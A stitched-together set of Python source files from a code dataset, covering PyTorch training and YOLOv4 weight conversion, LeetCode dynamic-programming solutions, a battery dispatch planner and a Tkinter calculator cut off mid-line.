\"conv2_leaky_1\", \"conv3_leaky_1\"],\n \"enc_conv_k\": [7, 5, 3],\n \"enc_conv_s\": [5, 3, 2],\n \"enc_conv_p\": [1, 1, 1],\n \n \"dec_conv_names\": [\"deconv1_leaky_1\", \"deconv2_leaky_1\", \"deconv3_leaky_1\"],\n \"dec_conv_k\": [4, 5, 7],\n \"dec_conv_s\": [2, 3, 5],\n \"dec_conv_p\": [1, 1, 1],\n \n \"enc_rnn_k\": [3, 3, 3],\n \"enc_rnn_s\": [1, 1, 1],\n \"enc_rnn_p\": [1, 1, 1],\n \n \"dec_rnn_k\": [3, 3, 3],\n \"dec_rnn_s\": [1, 1, 1],\n \"dec_rnn_p\": [1, 1, 1],\n \n \"final_conv_1_name\": \"conv3_leaky_2\",\n \"final_conv_1_c\": 8,\n \"final_conv_1_k\": 3,\n \"final_conv_1_s\": 1,\n \"final_conv_1_p\": 1,\n \n \"final_conv_2_name\": \"conv3_3\",\n \"final_conv_2_k\": 1,\n \"final_conv_2_s\": 1,\n \"final_conv_2_p\": 0,\n }\n","sub_path":"tests/test_impl_match/_ef_conv_lstm.py","file_name":"_ef_conv_lstm.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"55722084","text":"from data_loader.data_loader import LMDBDataSet\nimport torchvision.transforms.functional as F\nimport torch.utils.data as data\nimport torch.optim as optim\nimport torch\nimport sys\nimport torch.nn as nn\nfrom img_show import wrong_img_save\nfrom dice_loss import dice_coeff\nfrom models import resnet3d\nfrom utils.logger import log\nfrom tqdm import tqdm\nimport numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nBATCH_SIZE = 256\n\ndef channel_max(tensor):\n max_i = torch.zeros(tensor.size(0))\n for i in range(0, tensor.size(0)):\n max_i[i] = torch.argmax(tensor[i, :, :])\n return max_i\n\ndef adjust_learning_rate(epoch):\n lr = optimizer.param_groups[0]['lr']\n print(lr)\n if (epoch % 30) == 0:\n lr = lr / 10\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\ndef save_models(epoch):\n torch.save(model.state_dict(), 'model_save/resnet34_{}.model'.format(epoch))\n print('checkpoint saves')\n\ndef test(epoch):\n model.eval()\n test_acc = 0.0\n sample_sum = 0.0\n batch_sum = 0.0\n for i, (images, labels_cls) in enumerate(test_loader):\n\n images = images.to(device)\n labels_cls = labels_cls.to(device)\n outputs_cls, out_layer1 = model(images.float())\n # test_out = out_layer1[1, :, 0, :, :]\n # test_out = torch.norm(test_out, dim=0)\n prediction = m(outputs_cls).ge(0.5).long().view(-1)\n test_acc += torch.sum(prediction == labels_cls)\n sample_sum += len(labels_cls)\n batch_sum += 1\n\n # if epoch > 0:\n for i_img in range(len(prediction)):\n if prediction[i_img] != labels_cls[i_img]:\n # out_img = images[i_img][0][0]\n # for out_i in range(1, images[i_img].shape[1]):\n # out_img = torch.cat((out_img, images[i_img][0][out_i]), 1)\n out_i_img = out_layer1[i_img, :, :, :, :]\n out_img = torch.cat((torch.norm(out_i_img[:, 0, :, :], dim=0), torch.norm(out_i_img[:, 1, :, :], dim=0)), 1)\n\n out_img = F.to_pil_image(out_img.cpu())\n out_img.save('./img_result/wrong_epoch{}_iter{}_img{}_label{}.jpg'.format(epoch, i, i_img, labels_cls[i_img]))\n\n else:\n out_i_img = out_layer1[i_img, :, :, :, :]\n out_img = torch.cat((torch.norm(out_i_img[:, 0, :, :], dim=0), torch.norm(out_i_img[:, 1, :, :], dim=0)), 1)\n\n out_img = F.to_pil_image(out_img.cpu())\n out_img.save('./img_result/true_epoch{}_iter{}_img{}_label{}.jpg'.format(epoch, i, i_img, labels_cls[i_img]))\n\n\n test_acc = test_acc.float() / sample_sum\n\n # writer.add_image('images', grid, 0)\n # writer.add_graph(model, images)\n # writer.close()\n return test_acc \n\n\ndef train(num_epochs):\n best_acc = 0.6\n for epoch in range(num_epochs):\n # adjust_learning_rate(epoch)\n model.train()\n log.info('{} epochs in total, {} epoch'.format(num_epochs, epoch))\n train_loss = 0.0\n batch_sum = 0.0\n sample_sum = 0.0\n train_acc = 0.0\n batch_lr = []\n batch_loss = []\n for i, (images, labels_cls) in tqdm(enumerate(train_loader), total=len(train_loader)):\n # print(i)\n\n\n if i != 0:\n optimizer.param_groups[0]['lr'] = optimizer.param_groups[0]['lr'] * 1.1\n \n # print(optim_para['lr'])\n if optimizer.param_groups[0]['lr'] > 1:\n break\n batch_lr.append(optimizer.param_groups[0]['lr'])\n\n images = images.to(device)\n labels_cls = labels_cls.to(device)\n optimizer.zero_grad()\n outputs_cls, _ = model(images)\n\n loss = loss_bce(outputs_cls.view(-1), labels_cls.float())\n \n loss.backward()\n optimizer.step()\n\n prediction = m(outputs_cls).ge(0.5).long().view(-1)\n train_acc += torch.sum(prediction == labels_cls)\n batch_sum += 1\n sample_sum += len(labels_cls)\n # print(prediction.shape, labels_cls.shape)\n # print(train_acc)\n batch_loss.append(loss.data)\n\n\n # plt.plot(batch_lr, batch_loss)\n with open('lr_loss.txt', 'w') as outputs:\n for i in range(len(batch_loss)):\n outputs.write(str(batch_lr[i]) + ' ' + '{:.5f}'.format(batch_loss[i].data) + '\\n')\n\n\n # test_acc = test(epoch)\n \n return 0\n\nif __name__ == '__main__':\n cuda_avail = torch.cuda.is_available()\n device = \"cuda:0\" if cuda_avail else \"cpu\"\n m = nn.Sigmoid().to(device)\n loss_bce = nn.BCEWithLogitsLoss().to(device)\n loss_l1 = nn.SmoothL1Loss().to(device)\n\n train_dataset = LMDBDataSet(\"./data_loader/dataset/train\", 0.0, 1.0)\n test_dataset = LMDBDataSet(\"./data_loader/dataset/test\", 0.0, 1.0)\n train_loader = data.DataLoader(train_dataset, batch_size= BATCH_SIZE, num_workers=8)\n test_loader = data.DataLoader(test_dataset, batch_size= BATCH_SIZE, num_workers=8)\n\n print('hello1')\n lamda_log = list()\n # for lamda in range(50, 10100, 20):\n model = resnet3d.resnet18()\n model = model.to(device)\n # optimizer = optim.Adam(model.parameters(), lr=0.001, weight_decay= 0.001)\n optimizer = optim.SGD(model.parameters(), lr=0.000001)\n\n test_flag = False\n if test_flag:\n path = './model_save/model_9_acc_0.7400000095367432.model'\n model.load_state_dict(torch.load(path)) \n\n total_test_acc = train(1)\n # lamda_log.append([lamda, total_test_acc])","sub_path":"3d_new_test_mixup/find_lr.py","file_name":"find_lr.py","file_ext":"py","file_size_in_byte":5543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"428621201","text":"# 213. House robber II \n# You are a professional robber planning to rob houses along a street. Each house has a certain amount of money stashed. All houses at this place are arranged in a circle. That means the first house is the neighbor of the last one. Meanwhile, adjacent houses have a security system connected, and it will automatically contact the police if two adjacent houses were broken into on the same night.\n\n# Given a list of non-negative integers nums representing the amount of money of each house, return the maximum amount of money you can rob tonight without alerting the police.\n\n# Example 1:\n\n# Input: nums = [2,3,2]\n# Output: 3\n# Explanation: You cannot rob house 1 (money = 2) and then rob house 3 (money = 2), because they are adjacent houses.\n# Example 2:\n\n# Input: nums = [1,2,3,1]\n# Output: 4\n# Explanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).\n# Total amount you can rob = 1 + 3 = 4.\n# Example 3:\n\n# Input: nums = [0]\n# Output: 0\n \n\n# Constraints:\n\n# 1 <= nums.length <= 100\n# 0 <= nums[i] <= 1000\n\nclass Solution(object):\n def rob(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums) == 1:\n return nums[0]\n \n left = self.checkHouses(nums[0:-1])\n right = self.checkHouses(list(reversed(nums[1:])))\n return max(left, right)\n \n def checkHouses(self, houses):\n loot = [0] * len(houses)\n for i, num in enumerate(houses):\n if i == 0:\n loot[i] = num\n elif i == 1:\n loot[i] = max(loot[i-1], num)\n else:\n loot[i] = max(loot[i-1], loot[i-2] + num)\n \n return loot[-1]\n \n \n","sub_path":"medium/213.py","file_name":"213.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"18213766","text":"from functools import lru_cache\n\ndef simetricen(niz):\n return niz == niz[::-1]\n\n@lru_cache(maxsize=None)\ndef stevilo_delov (w, je_simetricen):\n if w == '':\n return 0\n if je_simetricen(w):\n return 1\n options = [stevilo_delov(w[:i], je_simetricen) + \n stevilo_delov(w[i:], je_simetricen) for i in range(1, len(w))]\n n = min(options)\n return n\n\n@lru_cache(maxsize=None)\ndef razdeli(w, je_simetricen):\n if len(w) == 0:\n return (0, [w])\n if je_simetricen(w):\n return (1, [w])\n options = None\n for i in range(1, len(w)):\n nl, wl = razdeli(w[:i], je_simetricen)\n nr, wr = razdeli(w[i:], je_simetricen)\n k, ws = nl + nr, wl + wr\n\n if options == None:\n options = (k, ws)\n \n else:\n m, l = options\n if k < m :\n options = (k, ws)\n return options\n\ndef vsotno_simetricen(niz):\n if len(niz) == 1:\n return True\n l = [int(c) for c in niz]\n n = int (len(niz) / 2)\n return sum(l[:n]) == sum(l[n:])\n","sub_path":"izpiti/2018-07-06/test_3naloga.py","file_name":"test_3naloga.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"115083640","text":"from jaratoolbox.test.nick import behavioranalysis_vnick as behavioranalysis\nfrom jaratoolbox import extrastats\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nsalChordEsts = np.zeros([2, 4])\nmusChordEsts = np.zeros([2, 4])\nsalModEsts = np.zeros([2, 4])\nmusModEsts = np.zeros([2, 4])\n\n\nanimals = ['amod002', 'amod003']\nnAnimals = len(animals)\n\nmuscimolSessions = ['20160413a', '20160415a', '20160417a', '20160419a', '20160421a']\nsalineSessions = ['20160412a', '20160414a', '20160416a', '20160418a', '20160420a']\n\n## -- Figure with all animals\n\nplt.figure()\n\nfor indAnimal, animal in enumerate(animals):\n muscimolDataObjs, muscimolSoundTypes = behavioranalysis.load_behavior_sessions_sound_type(animal, muscimolSessions)\n salineDataObjs, salineSoundTypes = behavioranalysis.load_behavior_sessions_sound_type(animal, salineSessions)\n\n mdataChords = muscimolDataObjs[muscimolSoundTypes['chords']]\n sdataChords = salineDataObjs[salineSoundTypes['chords']]\n\n mdataMod = muscimolDataObjs[muscimolSoundTypes['amp_mod']]\n sdataMod = salineDataObjs[salineSoundTypes['amp_mod']]\n\n subplot2grid((nAnimals, 2), (indAnimal, 0))\n salChordEsts[indAnimal,:] = plot_psycurve_fit_and_data(sdataChords, 'k')\n musChordEsts[indAnimal,:] = plot_psycurve_fit_and_data(mdataChords, 'r')\n title('{},{}'.format(animal, 'chords'))\n\n subplot2grid((nAnimals, 2), (indAnimal, 1))\n salModEsts[indAnimal,:] = plot_psycurve_fit_and_data(sdataMod, 'k')\n musModEsts[indAnimal,:] = plot_psycurve_fit_and_data(mdataMod, 'r')\n title('{},{}'.format(animal, 'amp_mod'))\n\nplt.figure\n\n\n\ndef plot_psycurve_fit_and_data(bdata, plotColor):\n #Calculate the psychometric\n rightTrials = bdata['choice']==bdata.labels['choice']['right']\n freqEachTrial = bdata['targetFrequency']\n valid = bdata['valid']\n (possibleValues,fractionHitsEachValue,ciHitsEachValue,nTrialsEachValue,nHitsEachValue) = behavioranalysis.calculate_psychometric(rightTrials, freqEachTrial, valid)\n\n #Calculate the psycurve fit\n estimate = behavioranalysis.psycurve_fit_from_bdata(bdata, plotFits=0)\n\n #Plot in log2 space(fit is already in this space)\n possibleValues = np.log2(possibleValues)\n\n #Plot the stuff\n ax = plt.gca()\n plt.hold(1)\n xRange = possibleValues[-1]-possibleValues[1]\n fitxval = np.linspace(possibleValues[0]-0.1*xRange,possibleValues[-1]+0.1*xRange,40)\n fityvals = extrastats.psychfun(fitxval, *estimate)\n\n upperWhisker = ciHitsEachValue[1,:]-fractionHitsEachValue\n lowerWhisker = fractionHitsEachValue-ciHitsEachValue[0,:]\n (pline, pcaps, pbars) = plt.errorbar(possibleValues, fractionHitsEachValue,\n yerr = [lowerWhisker, upperWhisker],color='k', fmt=None)\n pdots = plt.plot(possibleValues, fractionHitsEachValue, 'o',mec='none',mfc='k',ms=8)\n\n setp(pcaps, color=plotColor)\n setp(pbars, color=plotColor)\n setp(pdots, markerfacecolor=plotColor)\n\n if np.unique(freqEachTrial)[0]<1000: #If Hz\n ax.set_xticks(possibleValues)\n ax.set_xticklabels(np.unique(freqEachTrial))\n plt.xlabel('Frequency (Hz)')\n else:\n ax.set_xticks(possibleValues)\n freqLabels = ['{:.03}'.format(x) for x in np.unique(freqEachTrial)/1000.0]\n ax.set_xticklabels(freqLabels)\n plt.xlabel('Frequency (kHz)')\n\n\n ax.plot(fitxval, fityvals, color=plotColor)\n plt.ylim([0, 1])\n plt.ylabel('Fraction Rightward Trials')\n\n return estimate\n\n","sub_path":"oldjaratest/nick/test042_fittedOverallMuscimolPerformance.py","file_name":"test042_fittedOverallMuscimolPerformance.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"166546535","text":"'''\nThis impementation based on https://github.com/hhaAndroid/mmdetection-mini\n'''\n\nfrom rfvision.tools.darknet2torch.darknet_weight_converter import WeightLoader\nfrom rflib.cnn import ConvModule\nfrom rfvision.components.backbones.cspdarknet import CSPBlock, ResBlock\nfrom rfvision.components.necks.yolo_neck import MakeNConv, FuseStage, SpatialPyramidPooling\nimport torch.nn as nn\nimport torch\nfrom collections import OrderedDict\n\nclass Head(nn.Module):\n def __init__(self, nchannels, nanchors, nclasses):\n super().__init__()\n cfg = dict(conv_cfg=None,\n norm_cfg=dict(type='BN', requires_grad=True),\n act_cfg=dict(type='LeakyReLU', negative_slope=0.1))\n mid_nchannels = 2 * nchannels\n layer_list = [\n ConvModule(nchannels, mid_nchannels, 3, 1, 1, **cfg),\n nn.Conv2d(mid_nchannels, nanchors * (5 + nclasses), 1, 1, 0),\n ]\n self.feature = nn.Sequential(*layer_list)\n\n def forward(self, data):\n x = self.feature(data)\n return x\n\n\n\nclass YOLOV4(nn.Module):\n def __init__(self, layers=(1, 2, 8, 8, 4), pretrained=False):\n super().__init__()\n cfg = dict(conv_cfg=None,\n norm_cfg=dict(type='BN', requires_grad=True),\n act_cfg=dict(type='LeakyReLU', negative_slope=0.1))\n self.custom_layers = (CSPBlock, ResBlock, Head, MakeNConv, FuseStage)\n num_anchors = (3, 3, 3)\n in_channels_list = (512, 256, 128)\n self.inplanes = 32\n self.conv0 = ConvModule(3, self.inplanes, kernel_size=3, stride=1, **cfg)\n self.feature_channels = [64, 128, 256, 512, 1024]\n\n self.backbone = nn.ModuleList([\n CSPBlock(self.inplanes, self.feature_channels[0], layers[0], first=True),\n CSPBlock(self.feature_channels[0], self.feature_channels[1], layers[1], first=False),\n CSPBlock(self.feature_channels[1], self.feature_channels[2], layers[2], first=False),\n CSPBlock(self.feature_channels[2], self.feature_channels[3], layers[3], first=False),\n CSPBlock(self.feature_channels[3], self.feature_channels[4], layers[4], first=False)\n ])\n\n self.neck1 = nn.ModuleList([\n # neck1\n nn.Sequential(MakeNConv(1024, 512, 3, **cfg, ),\n SpatialPyramidPooling(),\n MakeNConv(2048, 512, 3, **cfg)),\n\n nn.Sequential(FuseStage(512, **cfg),\n MakeNConv(512, 256, 5, **cfg)),\n\n nn.Sequential(FuseStage(256, **cfg),\n MakeNConv(256, 128, 5, **cfg)),\n ])\n self.head3 = nn.ModuleList([nn.Sequential(Head(in_channels_list[2], num_anchors[2], 80)),])\n self.neck2 = nn.ModuleList([nn.Sequential(FuseStage(128, **cfg, is_reversal=True), MakeNConv(512, 256, 5, **cfg)),])\n self.head2 = nn.ModuleList([nn.Sequential(Head(in_channels_list[1], num_anchors[1], 80)),])\n self.neck3 = nn.ModuleList([nn.Sequential(FuseStage(256, **cfg, is_reversal=True), MakeNConv(1024, 512, 5, **cfg)),])\n self.head1 = nn.ModuleList([nn.Sequential(Head(in_channels_list[0], num_anchors[0], 80)),])\n self.init_weights(pretrained)\n\n def __modules_recurse(self, mod=None):\n \"\"\" This function will recursively loop over all module children.\n Args:\n mod (torch.nn.Module, optional): Module to loop over; Default **self**\n \"\"\"\n if mod is None:\n mod = self\n for module in mod.children():\n if isinstance(module, (nn.ModuleList, nn.Sequential, self.custom_layers)):\n yield from self.__modules_recurse(module)\n else:\n yield module\n\n def init_weights(self, pretrained=None):\n if pretrained is not None:\n weights = WeightLoader(pretrained)\n for module in self.__modules_recurse():\n try:\n weights.load_layer(module)\n print(f'Layer loaded: {module}')\n if weights.start >= weights.size:\n print(f'Finished loading weights [{weights.start}/{weights.size} weights]')\n break\n except NotImplementedError:\n print(f'Layer skipped: {module.__class__.__name__}')\n\n def forward(self, x):\n return x\n\nif __name__ == '__main__':\n weight_path = '/home/hanyang/weights/yolov4.conv.137'\n m = YOLOV4(pretrained=weight_path)\n new_state_dict = OrderedDict()\n\n for k, v in m.state_dict().items():\n if k.startswith('conv0'):\n name = k.replace('conv0', 'backbone.conv0')\n elif k.startswith('backbone'):\n name = k.replace('backbone', 'backbone.stages')\n elif k.startswith('neck1'):\n name = k.replace('neck1', 'neck.layers')\n elif k.startswith('neck2'):\n name = k.replace('neck2.0', 'neck.layers.3')\n elif k.startswith('neck3'):\n name = k.replace('neck3.0', 'neck.layers.4')\n elif k.startswith('head1.0.0.feature.0'):\n name = k.replace('head1.0.0.feature.0', 'bbox_head.convs_bridge.0')\n elif k.startswith('head2.0.0.feature.0'):\n name = k.replace('head2.0.0.feature.0', 'bbox_head.convs_bridge.1')\n elif k.startswith('head3.0.0.feature.0'):\n name = k.replace('head3.0.0.feature.0', 'bbox_head.convs_bridge.2')\n elif k.startswith('head1.0.0.feature.1'):\n name = k.replace('head1.0.0.feature.1', 'bbox_head.convs_pred.0')\n elif k.startswith('head2.0.0.feature.1'):\n name = k.replace('head2.0.0.feature.1', 'bbox_head.convs_pred.1')\n elif k.startswith('head3.0.0.feature.1'):\n name = k.replace('head3.0.0.feature.1', 'bbox_head.convs_pred.2')\n else:\n name = k\n new_state_dict[name] = v\n data = {\"state_dict\": new_state_dict}\n torch.save(data, '/home/hanyang/weights/yolov4_conv_137.pth')","sub_path":"rfvision/tools/darknet2torch/yolov4.py","file_name":"yolov4.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"488904951","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nimport matplotlib.pyplot as plt\nimport numpy\n\n# fix random seed for reproducibility\n\nseed = 7\n\nnumpy.random.seed(seed)\n\ndataset = numpy.loadtxt(\"pima-indians-diabetes.csv\", delimiter=',')\n\nprint(dataset)\nX = dataset[:, 0:8]\nY = dataset[:, 8]\n\n# create model\n\nmodel = Sequential()\nmodel.add(Dense(12, input_dim=8, activation='relu'))\nmodel.add(Dense(8, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\n# compile model\nmodel.compile(loss=\"binary_crossentropy\", optimizer='adam', metrics=['accuracy'])\nfilepath = \"weights-improvement-{epoch:02d}-{val_loss:.2f}.hdf5\"\n\ncheckpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, model='max')\n\ncallbacks_list = [checkpoint]\n\nmodel.fit(X, Y, validation_split=0.33, epochs=150, batch_size=10, callbacks=callbacks_list, verbose=0)\n","sub_path":"myworkspace/translate_tutorial/ch14.py","file_name":"ch14.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"372559399","text":"\"\"\"\n656. Coin Path\n\nGiven an array A (index starts at 1) consisting of N integers: A1, A2, ..., AN and an integer B.\nThe integer B denotes that from any place (suppose the index is i) in the array A,\nyou can jump to any one of the place in the array A indexed i+1, i+2, …, i+B if this place can be jumped to.\nAlso, if you step on the index i, you have to pay Ai coins. If Ai is -1, it means you can’t jump to the place indexed i in the array.\n\nNow, you start from the place indexed 1 in the array A, and your aim is to reach the place indexed N using the minimum coins.\nYou need to return the path of indexes (starting from 1 to N) in the array you should take to get to the place indexed N using minimum coins.\n\nIf there are multiple paths with the same cost, return the lexicographically smallest such path.\n\nIf it's not possible to reach the place indexed N then you need to return an empty array.\n\nExample 1:\n\nInput: [1,2,4,-1,2], 2\nOutput: [1,3,5]\n\n\nExample 2:\n\nInput: [1,2,4,-1,2], 1\nOutput: []\n\n\nNote:\n\nPath Pa1, Pa2, ..., Pan is lexicographically smaller than Pb1, Pb2, ..., Pbm,\nif and only if at the first i where Pai and Pbi differ, Pai < Pbi; when no such i exists, then n < m.\nA1 >= 0. A2, ..., AN (if exist) will in the range of [-1, 100].\nLength of A is in the range of [1, 1000].\nB is in the range of [1, 100].\n\n\"\"\"\n\n\nclass CheapestJump:\n\n \"\"\"\n Approach #2 Using Memoization [Accepted]\n Algorithm\n\n In the recursive solution just discussed, a lot of duplicate function calls are made, since we are considering the same index through multiple paths.\n To remove this redundancy, we can make use of memoization.\n\n We keep a memomemo array, such that memo[i]memo[i] is used to store the minimum cost of jumps to reach the end of the array AA.\n Whenever the value for any index is calculated once, it is stored in its appropriate location.\n Thus, next time whenever the same function call is made, we can return the result directly from this memomemo array, pruning the search space to a great exte\n\n Complexity Analysis\n\n Time complexity : O(nB). memo array of size nn is filled only once. We also do a traversal over the nextnext array,\n which will go upto BB steps. Here, nn refers to the number of nodes in the given tree.\n\n Space complexity : O(n). The depth of the recursive tree can grow upto nn. nextnext array of size nn is used.\n \"\"\"\n def doit_dp_dfs(self, A, B):\n \"\"\"\n :type A: List[int]\n :type B: int\n :rtype: List[int]\n \"\"\"\n path = [-1 for _ in range(len(A))]\n\n def dfs(pos, path, memo):\n\n if pos in memo:\n return memo[pos]\n\n if pos == len(A) - 1:\n return A[pos]\n\n res = float('inf')\n for j in range(pos+1, pos+B+1):\n\n if j == len(A):\n break\n\n if A[j] != -1:\n d = dfs(j, path, memo)\n if d < res:\n res = d\n path[pos] = j\n\n res += A[pos]\n memo[pos] = res\n return res\n\n if A[-1] == -1:\n return []\n\n dfs(0, path, {})\n res = []\n i = 0\n while 0 <= i < len(path):\n res.append(i+1)\n i = path[i]\n\n return [] if res[-1] != len(A) else res\n\n \"\"\"\n Approach #3 Using Dynamic Programming [Accepted]\n Algorithm\n \n From the solutions discussed above, we can observe that the cost of jumping till the end of the array A \n starting from the index ii is only dependent on the elements following the index ii and not the ones before it. \n This inspires us to make use of Dynamic Programming to solve the current problem.\n \n We again make use of a next array to store the next jump locations. We also make use of a dp with the same size as that of the given AA array. \n dp[i]dp[i] is used to store the minimum cost of jumping till the end of the array AA, starting from the index ii. \n We start with the last index as the current index and proceed backwards for filling the nextnext and dpdp array.\n \n With ii as the current index, we consider all the next possible positions from i+1, i+2,..., i+B, and determine the position, j, \n which leads to a minimum cost of reaching the end of AA, which is given by A[i]+dp[j]A[i]+dp[j]. We update next[i]next[i] with this corresponding index. \n We also update dp[i]dp[i] with the minimum cost, to be used by the previous indices' cost calculations.\n \n At the end, we again jump over the indices as per the next array and put these indices in the resres array to be returned.\n Complexity Analysis\n\n Time complexity : O(nB). We need to consider all the possible BB positions for every current index considered in the A array. \n Here, A refers to the number of elements in AA.\n \n Space complexity : O(n). dp and nextnext array of size nn are used.\n \"\"\"\n def doit_dp(self, A, B):\n\n N = len(A)\n dp = [-1 for _ in range(N)]\n path = [-1 for _ in range(N)]\n dp[-1] = A[-1]\n\n for i in range(N-2, -1, -1):\n if A[i] == -1:\n continue\n\n for j in range(i + 1, min(len(A), i + B + 1)):\n if dp[j] == -1:\n continue\n\n if dp[i] == -1 or dp[i] > dp[j]:\n dp[i] = dp[j]\n path[i] = j\n\n dp[i] += A[i]\n\n i, res = 0, []\n while 0 <= i < len(A):\n res.append(i+1)\n i = path[i]\n\n if res[-1] != len(A):\n return []\n\n return res\n\n\n\n\n\n\nif __name__ == '__main__':\n\n res = CheapestJump().doit_dp([1, 2, 4, -1, 2], 2)\n\n\n","sub_path":"PythonLeetcode/Leetcode/656_CoinPath.py","file_name":"656_CoinPath.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"278950807","text":"import pandas as pd\nfrom NEMPRO import historical_inputs, planner, units, residual_demand\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\n\n\nraw_data_cache = 'C:/Users/nick/Documents/nem_data'\n\n# Build data set for calibrating the dispatch planner's price forecasting model.\nstart_time_historical_data = '2019/01/01 00:00:00'\nend_time_historical_data = '2020/01/01 00:00:00'\n\nregions_short_names ={\n 'QLD1': 'qld',\n 'NSW1': 'nsw',\n 'VIC1': 'vic',\n 'SA1': 'sa',\n 'TAS1': 'tas'\n}\n\nhistorical_data = residual_demand.get(start_time_historical_data, end_time_historical_data, raw_data_cache)\n\n\nfor region in ['QLD1', 'NSW1', 'VIC1', 'SA1', 'TAS1']:\n frac_peak_demand = residual_demand.get_region_fraction_of_max_residual_demand(historical_data, region)\n regional_data = historical_data[historical_data['REGIONID'] == region].loc[:, ['SETTLEMENTDATE', 'RESIDUALDEMAND']]\n forward_data = regional_data.copy()\n\n r = regions_short_names[region]\n regional_data = regional_data.rename(columns={'RESIDUALDEMAND': '{}-demand'.format(r)})\n regional_data['{}-energy'.format(r)] = regional_data['{}-demand'.format(r)]\n regional_data['{}-energy-fleet-dispatch'.format(r)] = 0.0\n regional_data = regional_data.reset_index(drop=True)\n regional_data['interval'] = regional_data.index\n regional_data = regional_data.drop(columns=['SETTLEMENTDATE'])\n\n forward_data = forward_data.reset_index(drop=True)\n forward_data['interval'] = forward_data.index\n settlement_dates = forward_data.loc[:, ['interval', 'SETTLEMENTDATE', 'RESIDUALDEMAND']]\n forward_data = forward_data.rename(columns={'RESIDUALDEMAND': '{}-demand'.format(r)})\n forward_data = forward_data.drop(columns=['SETTLEMENTDATE'])\n\n for battery_capacity_mw in range(0, 3300, 300):\n for storage_hours in [0.5, 1, 2, 3, 4, 8]:\n\n p = planner.DispatchPlanner(dispatch_interval=5, historical_data=regional_data,\n forward_data=forward_data, demand_delta_steps=1000, train_pct=0.005)\n\n battery = units.GenericUnit(p, initial_dispatch=0.0, optimisation_time_step=5)\n battery.set_service_region('energy', r)\n battery.add_from_market_energy_flow(battery_capacity_mw)\n battery.add_to_market_energy_flow(battery_capacity_mw)\n battery.add_storage(mwh=battery_capacity_mw * storage_hours,\n initial_mwh=battery_capacity_mw * storage_hours * 0.5,\n output_capacity=battery_capacity_mw, input_capacity=battery_capacity_mw,\n input_efficiency=0.9, output_efficiency=0.9)\n\n p.add_demand_smoothing_objective_function(r, 'energy')\n\n p.optimise()\n\n dispatch = battery.get_dispatch()\n\n dispatch = pd.merge(dispatch, settlement_dates, on='interval')\n dispatch.to_csv('battery_dispatch_profiles_v2/{}_{}_{}_month.csv'.format(r, battery_capacity_mw, storage_hours),\n index=False)\n","sub_path":"examples/battery_residual_demand_minimiser.py","file_name":"battery_residual_demand_minimiser.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"500063680","text":"from tkinter import *\r\nimport math\r\n\r\nroot = Tk()\r\nroot.title(\"Simple Calculator\")\r\n\r\ne = Entry(root, width=35, borderwidth=5)\r\ne.grid(row=0, column=0, columnspan=3, padx=10, pady=10)\r\n\r\n\t# Button Functions\r\n\r\ndef button_click(number):\r\n\tcurrent = e.get()\r\n\te.delete(0, END)\r\n\te.insert(0, str(current) + str(number))\r\n\r\ndef button_clear():\r\n\te.delete(0, END)\r\n\r\ndef button_equal():\r\n\tsecond_number = e.get()\r\n\te.delete(0, END)\r\n\r\n\tif math == \"addition\":\r\n\t\te.insert(0, f_num + float(second_number))\r\n\r\n\tif math == \"subtraction\":\r\n\t\te.insert(0, f_num - float(second_number))\r\n\r\n\tif math == \"multiplication\":\r\n\t\te.insert(0, f_num * float(second_number))\r\n\r\n\tif math == \"division\":\r\n\t\te.insert(0, f_num / float(second_number))\r\n\r\n\tif math == \"square\":\r\n\t\te.insert(0, f_num ** 2)\r\n\r\n\tif math == \"sqrt\":\r\n\t\te.insert(0, f_num ** 0.5)\r\n\r\n\tif math == \"plusminus\":\r\n\t\te.insert(0, f_num * -1)\r\n\r\n\tif math == \"percent\":\r\n\t\te.insert(0, 1/f_num)\r\n\r\ndef button_add():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"addition\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_subtract():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"subtraction\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_multiply():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"multiplication\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_divide():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"division\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_square():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"square\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\n\r\ndef button_percent():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal 